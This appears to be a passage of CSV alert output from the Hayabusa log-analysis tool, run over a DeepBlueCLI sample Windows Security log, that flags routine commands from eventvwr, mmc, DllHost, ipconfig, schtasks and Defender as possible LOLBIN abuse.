2016-08-31 03:55:29.358 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x8dc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:55:29.420 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-system.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x748 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:56:17.432 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1788 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:56:17.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x8e4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:56:42.015 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe70 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:56:42.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xfd4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:59:41.893 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xfac | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:59:41.954 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1798 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:00:08.701 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x14ac | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:00:08.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1708 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:00:25.559 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xf80 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:00:25.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x2a4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:00:45.207 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x298 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:00:45.252 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf44 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:02:16.930 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x4cc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:02:16.995 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1520 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:03:18.080 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11fc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:03:18.108 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xaac | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 05:48:41.903 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13b8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 05:49:01.091 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14c8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 05:50:48.340 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 05:51:10.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x10f8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 09:09:04.159 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x1064 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 09:09:04.174 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb50 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 09:11:15.295 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 09:11:16.100 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x1264 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 09:11:16.210 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1694 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 09:11:29.568 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 09:11:35.821 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1300 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 09:12:06.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 09:12:06.951 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1128 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 00:54:06.516 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x1100 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 00:54:07.012 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13f8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 00:54:07.725 +09:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 00:54:07.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1744 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 00:54:09.426 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x1464 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 00:54:28.302 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17bc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 01:12:27.928 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1274 | User: IEUser | LID: 
0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 01:12:27.973 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x8d0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 01:18:44.431 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1044 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 01:18:44.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x16d4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:01:48.411 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:01:48.594 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x1728 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:01:48.666 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xc08 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:03:48.398 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x14b8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:09:30.260 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdb4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:09:39.134 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:10:01.474 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1720 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:26:02.115 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xb0c | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:00:10.327 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x7f4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:05:18.971 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x12bc | User: IEUser | LID: 
0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:06:54.664 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x56c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:06:54.679 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{86D5EB8A-859F-4C7B-A76B-2BD819B7A850} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:39:28.543 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12e8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:39:28.691 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11e0 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:39:28.743 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
